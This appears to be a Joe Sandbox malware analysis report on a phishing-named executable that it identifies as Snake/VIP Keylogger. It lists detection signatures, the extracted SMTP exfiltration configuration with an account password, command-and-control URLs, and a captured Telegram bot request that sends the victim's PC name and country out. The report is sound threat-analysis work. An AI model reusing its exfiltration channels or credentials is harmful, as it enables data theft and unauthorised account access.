Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Request for Quotation Plug Valve.exe

Overview

General Information

Sample name:Request for Quotation Plug Valve.exe
Analysis ID:1529007
MD5:fa1c425a44a073cec7f36210a6d7c3e6
SHA1:70f4f24c7d4dd4bddfe2fa711f73d8c952be7d5b
SHA256:181b41addb05b81a4246bc0dfe801d408c7478322cca039b66e91fd0d37c4f47
Tags:exe
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "cashisok@pooonghanbd.com", "Password": "QvGP%z%2", "Host": "us2.smtp.mailhostbox.com", "Port": "587"}
{"Exfil Mode": "SMTP", "Username": "cashisok@pooonghanbd.com", "Password": "QvGP%z%2", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000003.00000002.4707717001.0000000002DD2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
    00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2d363:$a1: get_encryptedPassword
          • 0x2d670:$a2: get_encryptedUsername
          • 0x2d181:$a3: get_timePasswordChanged
          • 0x2d27c:$a4: get_passwordField
          • 0x2d379:$a5: set_encryptedPassword
          • 0x2ea0a:$a7: get_logins
          • 0x2e96d:$a10: KeyLoggerEventArgs
          • 0x2e5d2:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 14 entries
          SourceRuleDescriptionAuthorStrings
          1.2.Request for Quotation Plug Valve.exe.3839970.4.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            1.2.Request for Quotation Plug Valve.exe.3839970.4.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              1.2.Request for Quotation Plug Valve.exe.3839970.4.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                3.2.Request for Quotation Plug Valve.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  3.2.Request for Quotation Plug Valve.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    Click to see the 26 entries

                    System Summary

                    barindex
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 208.91.199.223, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe, Initiated: true, ProcessId: 6456, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49875
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-08T15:10:22.337547+020028033053Unknown Traffic192.168.2.649761188.114.96.3443TCP
                    2024-10-08T15:10:23.435351+020028033053Unknown Traffic192.168.2.649769188.114.96.3443TCP
                    2024-10-08T15:10:32.163088+020028033053Unknown Traffic192.168.2.649831188.114.96.3443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-08T15:10:20.736990+020028032742Potentially Bad Traffic192.168.2.649737193.122.130.080TCP
                    2024-10-08T15:10:21.752732+020028032742Potentially Bad Traffic192.168.2.649737193.122.130.080TCP
                    2024-10-08T15:10:22.861976+020028032742Potentially Bad Traffic192.168.2.649765193.122.130.080TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: Request for Quotation Plug Valve.exeAvira: detected
                    Source: 00000003.00000002.4707717001.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "cashisok@pooonghanbd.com", "Password": "QvGP%z%2", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
                    Source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "cashisok@pooonghanbd.com", "Password": "QvGP%z%2", "Host": "us2.smtp.mailhostbox.com", "Port": "587"}
                    Source: Request for Quotation Plug Valve.exeReversingLabs: Detection: 55%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: Request for Quotation Plug Valve.exeJoe Sandbox ML: detected

                    Location Tracking

                    barindex
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Request for Quotation Plug Valve.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49752 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49838 version: TLS 1.2
                    Source: Request for Quotation Plug Valve.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 4x nop then jmp 02ABF8E9h3_2_02ABF631
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 4x nop then jmp 02ABFD41h3_2_02ABFA88
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 4x nop then jmp 068E0D0Dh3_2_068E0B30
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 4x nop then jmp 068E1697h3_2_068E0B30
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 4x nop then jmp 068E31E0h3_2_068E2DC8
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 4x nop then jmp 068E2C19h3_2_068E2968
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 4x nop then jmp 068EE959h3_2_068EE6B0
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 4x nop then jmp 068EE0A9h3_2_068EDE00
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 4x nop then jmp 068EE501h3_2_068EE258
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 4x nop then jmp 068EF661h3_2_068EF3B8
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 4x nop then jmp 068EEDB1h3_2_068EEB08
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 4x nop then jmp 068EF209h3_2_068EEF60
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 4x nop then jmp 068ECF49h3_2_068ECCA0
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 4x nop then jmp 068ED3A1h3_2_068ED0F8
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 4x nop then jmp 068EFAB9h3_2_068EF810
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_068E0040
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 4x nop then jmp 068EDC51h3_2_068ED9A8
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 4x nop then jmp 068E31E0h3_2_068E2DBF
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 4x nop then jmp 068E31E0h3_2_068E310E
                    Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exeCode function: 4x nop then jmp 068ED7F9h3_2_068ED550

                    Networking

                    barindex
                    Source: unknownDNS query: name: api.telegram.org
                    Source: Yara matchFile source: 3.2.Request for Quotation Plug Valve.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.6:49875 -> 208.91.199.223:587
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:688098%0D%0ADate%20and%20Time:%2008/10/2024%20/%2023:13:49%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20688098%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                    Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
                    Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49765 -> 193.122.130.0:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49737 -> 193.122.130.0:80
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49769 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49831 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49761 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.6:49875 -> 208.91.199.223:587
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49752 version: TLS 1.0
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:688098%0D%0ADate%20and%20Time:%2008/10/2024%20/%2023:13:49%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20688098%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: global trafficDNS traffic detected: DNS query: us2.smtp.mailhostbox.com
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 08 Oct 2024 13:10:33 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002DD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                    Source: Request for Quotation Plug Valve.exe, 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                    Source: Request for Quotation Plug Valve.exe, 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                    Source: Request for Quotation Plug Valve.exe, 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: Request for Quotation Plug Valve.exe, 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002DD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                    Source: Request for Quotation Plug Valve.exe, 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003C01000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002CC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: Request for Quotation Plug Valve.exe, 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002CC6000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002CC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002CC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:688098%0D%0ADate%20a
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003C01000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003C01000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003C01000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002D67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003C01000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003C01000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003C01000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002C9F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002C2F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002CC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                    Source: Request for Quotation Plug Valve.exe, 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002C2F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002C59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002C9F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002CC6000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002C59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003C01000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003C01000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation Plug Valve.exe, 00000003.00000002.4710627227.0000000003EEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002D98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                    Source: Request for Quotation Plug Valve.exe, 00000003.00000002.4707717001.0000000002DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
